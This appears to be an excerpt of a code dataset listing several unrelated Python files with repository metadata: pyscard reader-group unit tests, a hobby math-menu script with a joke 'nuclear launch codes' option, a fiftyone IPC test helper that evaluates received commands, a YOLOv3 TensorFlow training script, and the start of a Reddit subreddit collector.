print(basin_size[largest_basins[0]]*basin_size[largest_basins[1]]*basin_size[largest_basins[2]])
| true
| true
|
790c7e2d9fdf394a11fec5da3617ad43ec97070e
| 5,702
|
py
|
Python
|
cacreader/pyscard-2.0.2/smartcard/test/framework/testcase_readergroups.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | null | null | null |
cacreader/pyscard-2.0.2/smartcard/test/framework/testcase_readergroups.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | null | null | null |
cacreader/pyscard-2.0.2/smartcard/test/framework/testcase_readergroups.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | null | null | null |
#! /usr/bin/env python3
"""Unit tests for smartcard.readers.ReaderGroups
This test case can be executed individually, or with all other test cases
thru testsuite_framework.py.
__author__ = "http://www.gemalto.com"
Copyright 2001-2012 gemalto
Author: Jean-Daniel Aussel, mailto:jean-daniel.aussel@gemalto.com
This file is part of pyscard.
pyscard is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
pyscard is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with pyscard; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import platform
import unittest
from smartcard.System import readergroups
from smartcard.scard import resourceManager
if 'winscard' == resourceManager and \
-1 == platform.platform().find('Windows-7'):
class testcase_readergroups(unittest.TestCase):
"""Test smartcard framework readersgroups."""
pinpadgroup = 'Pinpad$Readers'
biogroup = 'Biometric$Readers'
def testcase_readergroup_add(self):
"""tests groups=groups+[newgroups]"""
# take a snapshot of current groups
groupssnapshot = list(readergroups())
groups = readergroups()
# add pinpad group
groups = groups + [self.pinpadgroup]
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
# add pinpad a second time and biometric once
groups = groups + [self.biogroup, self.pinpadgroup]
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
# clean-up
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_iadd(self):
"""test groups+=[newgroups]"""
# take a snapshot of current groups
groupssnapshot = list(readergroups())
groups = readergroups()
# add pinpad group
groups += [self.pinpadgroup]
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
# add pinpad a second time and biometric once
groups += [self.biogroup, self.pinpadgroup]
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
# clean-up
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_radd(self):
"""test groups=[newgroups]+groups"""
# take a snapshot of current groups
groupssnapshot = list(readergroups())
groups = readergroups()
# add pinpad group
zgroups = [self.pinpadgroup] + groups
self.assertEqual(groups, groupssnapshot)
self.assertEqual(zgroups, groupssnapshot + [self.pinpadgroup])
self.assertTrue(isinstance(zgroups, type([])))
self.assertTrue(isinstance(groups, type(readergroups())))
# add pinpad a tiwce and biometric once
zgroups = \
[self.pinpadgroup, self.biogroup, self.pinpadgroup] + groups
self.assertEqual(groups, groupssnapshot)
self.assertEqual(
zgroups, groupssnapshot + [self.pinpadgroup, self.biogroup])
self.assertTrue(isinstance(zgroups, type([])))
self.assertTrue(isinstance(groups, type(readergroups())))
def testcase_readergroup_append(self):
"""test groups.append(newgroups)"""
# take a snapshot of current groups
groupssnapshot = list(readergroups())
groups = readergroups()
# add pinpad group
groups.append(self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
# add pinpad a second time
groups.append(self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
# add biometric once
groups.append(self.biogroup)
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
# clean-up
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_insert(self):
"""test groups.insert(i,newgroups)"""
# take a snapshot of current groups
groupssnapshot = list(readergroups())
groups = readergroups()
# add pinpad group
groups.insert(0, self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
# add pinpad a second time
groups.insert(1, self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
# add biometric once
groups.insert(1, self.biogroup)
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
# clean-up
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def suite():
suite1 = unittest.makeSuite(testcase_readergroups)
return unittest.TestSuite((suite1))
if __name__ == '__main__':
unittest.main()
| 35.197531
| 76
| 0.632936
|
import platform
import unittest
from smartcard.System import readergroups
from smartcard.scard import resourceManager
if 'winscard' == resourceManager and \
-1 == platform.platform().find('Windows-7'):
class testcase_readergroups(unittest.TestCase):
pinpadgroup = 'Pinpad$Readers'
biogroup = 'Biometric$Readers'
def testcase_readergroup_add(self):
groupssnapshot = list(readergroups())
groups = readergroups()
groups = groups + [self.pinpadgroup]
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups = groups + [self.biogroup, self.pinpadgroup]
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_iadd(self):
groupssnapshot = list(readergroups())
groups = readergroups()
groups += [self.pinpadgroup]
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups += [self.biogroup, self.pinpadgroup]
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_radd(self):
groupssnapshot = list(readergroups())
groups = readergroups()
zgroups = [self.pinpadgroup] + groups
self.assertEqual(groups, groupssnapshot)
self.assertEqual(zgroups, groupssnapshot + [self.pinpadgroup])
self.assertTrue(isinstance(zgroups, type([])))
self.assertTrue(isinstance(groups, type(readergroups())))
zgroups = \
[self.pinpadgroup, self.biogroup, self.pinpadgroup] + groups
self.assertEqual(groups, groupssnapshot)
self.assertEqual(
zgroups, groupssnapshot + [self.pinpadgroup, self.biogroup])
self.assertTrue(isinstance(zgroups, type([])))
self.assertTrue(isinstance(groups, type(readergroups())))
def testcase_readergroup_append(self):
groupssnapshot = list(readergroups())
groups = readergroups()
groups.append(self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups.append(self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups.append(self.biogroup)
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def testcase_readergroup_insert(self):
groupssnapshot = list(readergroups())
groups = readergroups()
groups.insert(0, self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups.insert(1, self.pinpadgroup)
self.assertEqual(groups, groupssnapshot + [self.pinpadgroup])
groups.insert(1, self.biogroup)
self.assertEqual(
groups, groupssnapshot + [self.pinpadgroup, self.biogroup])
groups.remove(self.biogroup)
groups.remove(self.pinpadgroup)
def suite():
suite1 = unittest.makeSuite(testcase_readergroups)
return unittest.TestSuite((suite1))
if __name__ == '__main__':
unittest.main()
| true
| true
|
790c7eff2b6847934590088a080fd9be468a144e
| 3,147
|
py
|
Python
|
Nivek maths/nivek-maths.py
|
ThiccTT/nivek-maths
|
37f222b3ddc72455313eb619a79bc6045b89b506
|
[
"MIT"
] | null | null | null |
Nivek maths/nivek-maths.py
|
ThiccTT/nivek-maths
|
37f222b3ddc72455313eb619a79bc6045b89b506
|
[
"MIT"
] | null | null | null |
Nivek maths/nivek-maths.py
|
ThiccTT/nivek-maths
|
37f222b3ddc72455313eb619a79bc6045b89b506
|
[
"MIT"
] | null | null | null |
import kanu
while True:
print('\n Select one:')
print('\t1 -> Solve a linear equation')
print('\t2 -> Simplify any expression')
print('\t3 -> Is this number a Perfect Square?')
print('\t4 -> Get Prime Numbers')
print('\t5 -> START A NUCLEAR WAR :)')
print('\t6 -> Factor Integers')
choice = input()
if choice == '1':
print('Enter the equation:', end=' ')
try:
print(kanu.solve_single_linear_equation(input()))
except kanu.NonLinearEquationError:
print('You entered a non-linear equation.')
elif choice == '2':
print('Enter the expression:', end=' ')
print(kanu.all_together_now(input()))
elif choice == '3':
import math
def is_perfect_square(y):
sqrt_value = math.sqrt(y)
return int(sqrt_value) ** 2 == y
number = int(input('Enter a number: '))
if is_perfect_square(number):
print("It is a perfect square!")
else:
print("It is NOT a perfect square!")
elif choice == '4':
number = int(input("Input an integer:"))
factors = []
while number % 2 == 0:
factors.append(2)
number //= 2
divisor = 3
while number != 1 and divisor <= number:
if number % divisor == 0:
factors.append(divisor)
number //= divisor
else:
divisor += 2
print("The Prime Factors are: ")
for i in range(len(factors)):
print(factors[i], end=',')
elif choice == '5':
print('Executing "GETTING THE FOOTBALL" ')
if choice == '5':
from tqdm import tqdm
x = 1
for i in tqdm(range(0, 1000000)):
for x in range(0, 100):
x *= 4
print("DONE")
print("HERE ARE THE NUCLEAR LAUNCH CODES...")
print(" 56 58 10 62 11 1 25 29 55 62")
print(" 5 8 1 9 6 7 4 3 10 20")
print(" 41 16 18 50 9 51 48 5 37 30")
print(" 40 3 34 61 59 2 39 46 28 47")
print(" 38 7 42 26 63 45 17 27 60 21")
print("Launch Nukes?")
print("\t1 -> YES")
print('\t2 -> NO')
choice = input()
if choice == '1':
print('Please Wait...')
from tqdm import tqdm
x = 1
for i in tqdm(range(0, 100000)):
for x in range(0, 95):
x *= 4
print('BYE BYE WORLD')
input('press ENTER to continue')
elif choice == '2':
print('Maybe Another Day.')
input('press ENTER to continue')
elif choice == '6':
import math
number = int(input("Enter a number: "))
factors = []
for i in range(1, int(math.sqrt(number)) + 1):
if number % i == 0:
factors.append(i)
factor_pair = number // i
if factor_pair != i:
factors.append(factor_pair)
factors.sort()
print(factors)
| 27.849558
| 61
| 0.479504
|
import kanu
while True:
print('\n Select one:')
print('\t1 -> Solve a linear equation')
print('\t2 -> Simplify any expression')
print('\t3 -> Is this number a Perfect Square?')
print('\t4 -> Get Prime Numbers')
print('\t5 -> START A NUCLEAR WAR :)')
print('\t6 -> Factor Integers')
choice = input()
if choice == '1':
print('Enter the equation:', end=' ')
try:
print(kanu.solve_single_linear_equation(input()))
except kanu.NonLinearEquationError:
print('You entered a non-linear equation.')
elif choice == '2':
print('Enter the expression:', end=' ')
print(kanu.all_together_now(input()))
elif choice == '3':
import math
def is_perfect_square(y):
sqrt_value = math.sqrt(y)
return int(sqrt_value) ** 2 == y
number = int(input('Enter a number: '))
if is_perfect_square(number):
print("It is a perfect square!")
else:
print("It is NOT a perfect square!")
elif choice == '4':
number = int(input("Input an integer:"))
factors = []
while number % 2 == 0:
factors.append(2)
number //= 2
divisor = 3
while number != 1 and divisor <= number:
if number % divisor == 0:
factors.append(divisor)
number //= divisor
else:
divisor += 2
print("The Prime Factors are: ")
for i in range(len(factors)):
print(factors[i], end=',')
elif choice == '5':
print('Executing "GETTING THE FOOTBALL" ')
if choice == '5':
from tqdm import tqdm
x = 1
for i in tqdm(range(0, 1000000)):
for x in range(0, 100):
x *= 4
print("DONE")
print("HERE ARE THE NUCLEAR LAUNCH CODES...")
print(" 56 58 10 62 11 1 25 29 55 62")
print(" 5 8 1 9 6 7 4 3 10 20")
print(" 41 16 18 50 9 51 48 5 37 30")
print(" 40 3 34 61 59 2 39 46 28 47")
print(" 38 7 42 26 63 45 17 27 60 21")
print("Launch Nukes?")
print("\t1 -> YES")
print('\t2 -> NO')
choice = input()
if choice == '1':
print('Please Wait...')
from tqdm import tqdm
x = 1
for i in tqdm(range(0, 100000)):
for x in range(0, 95):
x *= 4
print('BYE BYE WORLD')
input('press ENTER to continue')
elif choice == '2':
print('Maybe Another Day.')
input('press ENTER to continue')
elif choice == '6':
import math
number = int(input("Enter a number: "))
factors = []
for i in range(1, int(math.sqrt(number)) + 1):
if number % i == 0:
factors.append(i)
factor_pair = number // i
if factor_pair != i:
factors.append(factor_pair)
factors.sort()
print(factors)
| true
| true
|
790c80f4c14bdf6903ead32c4acdbd76b70246ed
| 530
|
py
|
Python
|
tests/utils/interactive_python.py
|
Bukkster/fiftyone
|
c061216de5094131c8ce8718d8a6ac58056b003e
|
[
"Apache-2.0"
] | 3
|
2022-01-18T06:13:33.000Z
|
2022-02-14T13:28:23.000Z
|
tests/utils/interactive_python.py
|
Bukkster/fiftyone
|
c061216de5094131c8ce8718d8a6ac58056b003e
|
[
"Apache-2.0"
] | null | null | null |
tests/utils/interactive_python.py
|
Bukkster/fiftyone
|
c061216de5094131c8ce8718d8a6ac58056b003e
|
[
"Apache-2.0"
] | null | null | null |
"""
A script that simulates a Python shell and accepts arbitrary commands to
execute. For use by service tests.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import os
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.service.ipc import IPCServer
env = {}
def handle_message(message):
try:
code = compile(message, "", "eval")
except SyntaxError:
code = compile(message, "", "exec")
return eval(code, env)
IPCServer(handle_message).serve_forever()
| 19.62963
| 72
| 0.688679
|
import os
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.service.ipc import IPCServer
env = {}
def handle_message(message):
try:
code = compile(message, "", "eval")
except SyntaxError:
code = compile(message, "", "exec")
return eval(code, env)
IPCServer(handle_message).serve_forever()
| true
| true
|
790c8212906e2e6267368f455cbefe1625b1c2d4
| 9,512
|
py
|
Python
|
train.py
|
finite-infinity/tensorflow-serving-yolov3
|
d9244b2b12c2c6370638f48109f7a8f2ffeaa4c4
|
[
"MIT"
] | 428
|
2019-10-15T15:30:01.000Z
|
2022-03-30T02:14:44.000Z
|
train.py
|
finite-infinity/tensorflow-serving-yolov3
|
d9244b2b12c2c6370638f48109f7a8f2ffeaa4c4
|
[
"MIT"
] | 115
|
2019-10-24T12:59:26.000Z
|
2022-03-12T00:02:34.000Z
|
train.py
|
finite-infinity/tensorflow-serving-yolov3
|
d9244b2b12c2c6370638f48109f7a8f2ffeaa4c4
|
[
"MIT"
] | 131
|
2019-10-21T06:40:12.000Z
|
2022-03-18T21:26:18.000Z
|
#! /usr/bin/env python
# coding=utf-8
import os
import time
import shutil
import numpy as np
import tensorflow as tf
import core.utils as utils
from tqdm import tqdm
from core.dataset import Dataset
from core.yolov3 import YOLOV3
from core.config import cfg
class YoloTrain(object):
def __init__(self): # 从config文件获取到一些变量
self.anchor_per_scale = cfg.YOLO.ANCHOR_PER_SCALE
self.classes = utils.read_class_names(cfg.YOLO.CLASSES)
self.num_classes = len(self.classes)
self.learn_rate_init = cfg.TRAIN.LEARN_RATE_INIT
self.learn_rate_end = cfg.TRAIN.LEARN_RATE_END
self.first_stage_epochs = cfg.TRAIN.FISRT_STAGE_EPOCHS
self.second_stage_epochs = cfg.TRAIN.SECOND_STAGE_EPOCHS
self.warmup_periods = cfg.TRAIN.WARMUP_EPOCHS
self.initial_weight = cfg.TRAIN.INITIAL_WEIGHT
self.time = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
self.moving_ave_decay = cfg.YOLO.MOVING_AVE_DECAY
self.max_bbox_per_scale = 150
self.train_logdir = "./data/log/train" # 日志保存地址
self.trainset = Dataset('train')
self.testset = Dataset('test')
self.steps_per_period = len(self.trainset)
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
with tf.name_scope('define_input'): # 定义输入层
self.input_data = tf.placeholder(dtype=tf.float32, name='input_data')
self.label_sbbox = tf.placeholder(dtype=tf.float32, name='label_sbbox')
self.label_mbbox = tf.placeholder(dtype=tf.float32, name='label_mbbox')
self.label_lbbox = tf.placeholder(dtype=tf.float32, name='label_lbbox')
self.true_sbboxes = tf.placeholder(dtype=tf.float32, name='sbboxes')
self.true_mbboxes = tf.placeholder(dtype=tf.float32, name='mbboxes')
self.true_lbboxes = tf.placeholder(dtype=tf.float32, name='lbboxes')
self.trainable = tf.placeholder(dtype=tf.bool, name='training')
with tf.name_scope("define_loss"): # 定义损失函数
self.model = YOLOV3(self.input_data, self.trainable)
self.net_var = tf.global_variables()
self.giou_loss, self.conf_loss, self.prob_loss = self.model.compute_loss(
self.label_sbbox, self.label_mbbox, self.label_lbbox,
self.true_sbboxes, self.true_mbboxes, self.true_lbboxes)
self.loss = self.giou_loss + self.conf_loss + self.prob_loss
with tf.name_scope('learn_rate'): # 定义学习率
self.global_step = tf.Variable(1.0, dtype=tf.float64, trainable=False, name='global_step')
warmup_steps = tf.constant(self.warmup_periods * self.steps_per_period,
dtype=tf.float64, name='warmup_steps')
train_steps = tf.constant((self.first_stage_epochs + self.second_stage_epochs) * self.steps_per_period,
dtype=tf.float64, name='train_steps')
self.learn_rate = tf.cond(
pred=self.global_step < warmup_steps,
true_fn=lambda: self.global_step / warmup_steps * self.learn_rate_init,
false_fn=lambda: self.learn_rate_end + 0.5 * (self.learn_rate_init - self.learn_rate_end) *
(1 + tf.cos(
(self.global_step - warmup_steps) / (train_steps - warmup_steps) * np.pi))
)
global_step_update = tf.assign_add(self.global_step, 1.0)
'''
warmup_steps作用:
神经网络在刚开始训练的过程中容易出现loss=NaN的情况,为了尽量避免这个情况,因此初始的学习率设置得很低
但是这又使得训练速度变慢了。因此,采用逐渐增大的学习率,从而达到既可以尽量避免出现nan,又可以等训练过程稳定了再增大训练速度的目的。
'''
with tf.name_scope("define_weight_decay"): # 指数平滑,可以让算法在最后不那么震荡,结果更有鲁棒性
moving_ave = tf.train.ExponentialMovingAverage(self.moving_ave_decay).apply(tf.trainable_variables())
# 指定需要恢复的参数。层等信息, 位置提前,减少模型体积。
with tf.name_scope('loader_and_saver'):
variables_to_restore = [v for v in self.net_var if
v.name.split('/')[0] not in ['conv_sbbox', 'conv_mbbox', 'conv_lbbox']]
self.loader = tf.train.Saver(variables_to_restore)
self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=1)
with tf.name_scope("define_first_stage_train"): # 第一阶段训练,只训练指定层
self.first_stage_trainable_var_list = []
for var in tf.trainable_variables():
var_name = var.op.name
var_name_mess = str(var_name).split('/')
if var_name_mess[0] in ['conv_sbbox', 'conv_mbbox', 'conv_lbbox']:
self.first_stage_trainable_var_list.append(var)
first_stage_optimizer = tf.train.AdamOptimizer(self.learn_rate).minimize(self.loss,
var_list=self.first_stage_trainable_var_list)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([first_stage_optimizer, global_step_update]):
with tf.control_dependencies([moving_ave]):
self.train_op_with_frozen_variables = tf.no_op()
with tf.name_scope("define_second_stage_train"): # 第二阶段训练,释放所有层
second_stage_trainable_var_list = tf.trainable_variables()
second_stage_optimizer = tf.train.AdamOptimizer(self.learn_rate).minimize(self.loss,
var_list=second_stage_trainable_var_list)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([second_stage_optimizer, global_step_update]):
with tf.control_dependencies([moving_ave]):
self.train_op_with_all_variables = tf.no_op()
with tf.name_scope('summary'):
tf.summary.scalar("learn_rate", self.learn_rate)
tf.summary.scalar("giou_loss", self.giou_loss)
tf.summary.scalar("conf_loss", self.conf_loss)
tf.summary.scalar("prob_loss", self.prob_loss)
tf.summary.scalar("total_loss", self.loss)
logdir = "./data/log/" # 日志保存地址
if os.path.exists(logdir): shutil.rmtree(logdir)
os.mkdir(logdir)
self.write_op = tf.summary.merge_all()
self.summary_writer = tf.summary.FileWriter(logdir, graph=self.sess.graph)
def train(self):
self.sess.run(tf.global_variables_initializer())
try:
print('=> Restoring weights from: %s ... ' % self.initial_weight)
self.loader.restore(self.sess, self.initial_weight)
except:
print('=> %s does not exist !!!' % self.initial_weight)
print('=> Now it starts to train YOLOV3 from scratch ...')
self.first_stage_epochs = 0
# 阶段学习率
for epoch in range(1, 1 + self.first_stage_epochs + self.second_stage_epochs):
if epoch <= self.first_stage_epochs:
train_op = self.train_op_with_frozen_variables
else:
train_op = self.train_op_with_all_variables
# tqdm is a visualization tool that displays an Iterable object in a progree bar
pbar = tqdm(self.trainset)
train_epoch_loss, test_epoch_loss = [], []
for train_data in pbar:
_, summary, train_step_loss, global_step_val = self.sess.run(
[train_op, self.write_op, self.loss, self.global_step], feed_dict={
self.input_data: train_data[0],
self.label_sbbox: train_data[1],
self.label_mbbox: train_data[2],
self.label_lbbox: train_data[3],
self.true_sbboxes: train_data[4],
self.true_mbboxes: train_data[5],
self.true_lbboxes: train_data[6],
self.trainable: True,
})
train_epoch_loss.append(train_step_loss)
self.summary_writer.add_summary(summary, global_step_val)
pbar.set_description("train loss: %.2f" % train_step_loss)
for test_data in self.testset:
test_step_loss = self.sess.run(self.loss, feed_dict={
self.input_data: test_data[0],
self.label_sbbox: test_data[1],
self.label_mbbox: test_data[2],
self.label_lbbox: test_data[3],
self.true_sbboxes: test_data[4],
self.true_mbboxes: test_data[5],
self.true_lbboxes: test_data[6],
self.trainable: False,
})
test_epoch_loss.append(test_step_loss)
train_epoch_loss, test_epoch_loss = np.mean(train_epoch_loss), np.mean(test_epoch_loss)
ckpt_file = "./checkpoint/yolov3_train_loss=%.4f.ckpt" % train_epoch_loss
log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
print("=> Epoch: %2d Time: %s Train loss: %.2f Test loss: %.2f Saving %s ..."
% (epoch, log_time, train_epoch_loss, test_epoch_loss, ckpt_file))
self.saver.save(self.sess, ckpt_file, global_step=epoch)
if __name__ == '__main__': YoloTrain().train()
| 51.978142
| 130
| 0.610387
|
import os
import time
import shutil
import numpy as np
import tensorflow as tf
import core.utils as utils
from tqdm import tqdm
from core.dataset import Dataset
from core.yolov3 import YOLOV3
from core.config import cfg
class YoloTrain(object):
def __init__(self):
self.anchor_per_scale = cfg.YOLO.ANCHOR_PER_SCALE
self.classes = utils.read_class_names(cfg.YOLO.CLASSES)
self.num_classes = len(self.classes)
self.learn_rate_init = cfg.TRAIN.LEARN_RATE_INIT
self.learn_rate_end = cfg.TRAIN.LEARN_RATE_END
self.first_stage_epochs = cfg.TRAIN.FISRT_STAGE_EPOCHS
self.second_stage_epochs = cfg.TRAIN.SECOND_STAGE_EPOCHS
self.warmup_periods = cfg.TRAIN.WARMUP_EPOCHS
self.initial_weight = cfg.TRAIN.INITIAL_WEIGHT
self.time = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
self.moving_ave_decay = cfg.YOLO.MOVING_AVE_DECAY
self.max_bbox_per_scale = 150
self.train_logdir = "./data/log/train"
self.trainset = Dataset('train')
self.testset = Dataset('test')
self.steps_per_period = len(self.trainset)
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
with tf.name_scope('define_input'):
self.input_data = tf.placeholder(dtype=tf.float32, name='input_data')
self.label_sbbox = tf.placeholder(dtype=tf.float32, name='label_sbbox')
self.label_mbbox = tf.placeholder(dtype=tf.float32, name='label_mbbox')
self.label_lbbox = tf.placeholder(dtype=tf.float32, name='label_lbbox')
self.true_sbboxes = tf.placeholder(dtype=tf.float32, name='sbboxes')
self.true_mbboxes = tf.placeholder(dtype=tf.float32, name='mbboxes')
self.true_lbboxes = tf.placeholder(dtype=tf.float32, name='lbboxes')
self.trainable = tf.placeholder(dtype=tf.bool, name='training')
with tf.name_scope("define_loss"):
self.model = YOLOV3(self.input_data, self.trainable)
self.net_var = tf.global_variables()
self.giou_loss, self.conf_loss, self.prob_loss = self.model.compute_loss(
self.label_sbbox, self.label_mbbox, self.label_lbbox,
self.true_sbboxes, self.true_mbboxes, self.true_lbboxes)
self.loss = self.giou_loss + self.conf_loss + self.prob_loss
with tf.name_scope('learn_rate'):
self.global_step = tf.Variable(1.0, dtype=tf.float64, trainable=False, name='global_step')
warmup_steps = tf.constant(self.warmup_periods * self.steps_per_period,
dtype=tf.float64, name='warmup_steps')
train_steps = tf.constant((self.first_stage_epochs + self.second_stage_epochs) * self.steps_per_period,
dtype=tf.float64, name='train_steps')
self.learn_rate = tf.cond(
pred=self.global_step < warmup_steps,
true_fn=lambda: self.global_step / warmup_steps * self.learn_rate_init,
false_fn=lambda: self.learn_rate_end + 0.5 * (self.learn_rate_init - self.learn_rate_end) *
(1 + tf.cos(
(self.global_step - warmup_steps) / (train_steps - warmup_steps) * np.pi))
)
global_step_update = tf.assign_add(self.global_step, 1.0)
with tf.name_scope("define_weight_decay"):
moving_ave = tf.train.ExponentialMovingAverage(self.moving_ave_decay).apply(tf.trainable_variables())
with tf.name_scope('loader_and_saver'):
variables_to_restore = [v for v in self.net_var if
v.name.split('/')[0] not in ['conv_sbbox', 'conv_mbbox', 'conv_lbbox']]
self.loader = tf.train.Saver(variables_to_restore)
self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=1)
with tf.name_scope("define_first_stage_train"):
self.first_stage_trainable_var_list = []
for var in tf.trainable_variables():
var_name = var.op.name
var_name_mess = str(var_name).split('/')
if var_name_mess[0] in ['conv_sbbox', 'conv_mbbox', 'conv_lbbox']:
self.first_stage_trainable_var_list.append(var)
first_stage_optimizer = tf.train.AdamOptimizer(self.learn_rate).minimize(self.loss,
var_list=self.first_stage_trainable_var_list)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([first_stage_optimizer, global_step_update]):
with tf.control_dependencies([moving_ave]):
self.train_op_with_frozen_variables = tf.no_op()
with tf.name_scope("define_second_stage_train"):
second_stage_trainable_var_list = tf.trainable_variables()
second_stage_optimizer = tf.train.AdamOptimizer(self.learn_rate).minimize(self.loss,
var_list=second_stage_trainable_var_list)
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
with tf.control_dependencies([second_stage_optimizer, global_step_update]):
with tf.control_dependencies([moving_ave]):
self.train_op_with_all_variables = tf.no_op()
with tf.name_scope('summary'):
tf.summary.scalar("learn_rate", self.learn_rate)
tf.summary.scalar("giou_loss", self.giou_loss)
tf.summary.scalar("conf_loss", self.conf_loss)
tf.summary.scalar("prob_loss", self.prob_loss)
tf.summary.scalar("total_loss", self.loss)
logdir = "./data/log/"
if os.path.exists(logdir): shutil.rmtree(logdir)
os.mkdir(logdir)
self.write_op = tf.summary.merge_all()
self.summary_writer = tf.summary.FileWriter(logdir, graph=self.sess.graph)
def train(self):
self.sess.run(tf.global_variables_initializer())
try:
print('=> Restoring weights from: %s ... ' % self.initial_weight)
self.loader.restore(self.sess, self.initial_weight)
except:
print('=> %s does not exist !!!' % self.initial_weight)
print('=> Now it starts to train YOLOV3 from scratch ...')
self.first_stage_epochs = 0
for epoch in range(1, 1 + self.first_stage_epochs + self.second_stage_epochs):
if epoch <= self.first_stage_epochs:
train_op = self.train_op_with_frozen_variables
else:
train_op = self.train_op_with_all_variables
pbar = tqdm(self.trainset)
train_epoch_loss, test_epoch_loss = [], []
for train_data in pbar:
_, summary, train_step_loss, global_step_val = self.sess.run(
[train_op, self.write_op, self.loss, self.global_step], feed_dict={
self.input_data: train_data[0],
self.label_sbbox: train_data[1],
self.label_mbbox: train_data[2],
self.label_lbbox: train_data[3],
self.true_sbboxes: train_data[4],
self.true_mbboxes: train_data[5],
self.true_lbboxes: train_data[6],
self.trainable: True,
})
train_epoch_loss.append(train_step_loss)
self.summary_writer.add_summary(summary, global_step_val)
pbar.set_description("train loss: %.2f" % train_step_loss)
for test_data in self.testset:
test_step_loss = self.sess.run(self.loss, feed_dict={
self.input_data: test_data[0],
self.label_sbbox: test_data[1],
self.label_mbbox: test_data[2],
self.label_lbbox: test_data[3],
self.true_sbboxes: test_data[4],
self.true_mbboxes: test_data[5],
self.true_lbboxes: test_data[6],
self.trainable: False,
})
test_epoch_loss.append(test_step_loss)
train_epoch_loss, test_epoch_loss = np.mean(train_epoch_loss), np.mean(test_epoch_loss)
ckpt_file = "./checkpoint/yolov3_train_loss=%.4f.ckpt" % train_epoch_loss
log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
print("=> Epoch: %2d Time: %s Train loss: %.2f Test loss: %.2f Saving %s ..."
% (epoch, log_time, train_epoch_loss, test_epoch_loss, ckpt_file))
self.saver.save(self.sess, ckpt_file, global_step=epoch)
if __name__ == '__main__': YoloTrain().train()
| true
| true
|
790c82c158782609b311d42e9802acdd50fad13c
| 586
|
py
|
Python
|
projectBase/background/collectSubRedditsforCovid.py
|
hseyindemir/swe_773_hdemir
|
f8ab5086284e0b6dc1923cb1c1b73e4514613df4
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | null | null | null |
projectBase/background/collectSubRedditsforCovid.py
|
hseyindemir/swe_773_hdemir
|
f8ab5086284e0b6dc1923cb1c1b73e4514613df4
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | 9
|
2020-11-02T17:30:48.000Z
|
2021-01-20T06:48:17.000Z
|
projectBase/background/collectSubRedditsforCovid.py
|
hseyindemir/swe_773_hdemir
|
f8ab5086284e0b6dc1923cb1c1b73e4514613df4
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | null | null | null |
import praw
import database_infrastructure.dbHandler as dbController
from apscheduler.schedulers.background import BackgroundScheduler
import redditController.collectSubredditsForAsync as redditController
def collectSubredditsForCovid():
redditController.collectSubredditsForCovid('covid')
redditController.collectSubredditsForCovid('covid19')
def collectAsync():
print("registering async background job")
scheduler = BackgroundScheduler()
